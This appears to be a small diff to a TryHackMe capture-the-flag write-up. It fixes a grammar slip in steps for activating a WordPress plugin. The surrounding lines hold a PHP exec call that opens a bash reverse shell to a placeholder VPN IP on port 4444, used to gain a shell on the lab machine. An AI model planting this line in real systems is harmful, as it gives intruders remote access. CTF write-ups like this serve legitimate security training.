blackviking27/CTFs/TryHackMe/For Buisness Reason/For_buisness_reason_writeup.md

 `exec('/bin/bash -c "bash -i >& /dev/tcp/{YOUR VPN IP}/4444 0>&1"');`
 and update the file.

-Go back installed plugins and activate the plugin.
+Go back to installed plugins and activate the plugin.
 <br></br><img src='./img/Screenshot (120).png' /><br></br>
 and we will get back a shell.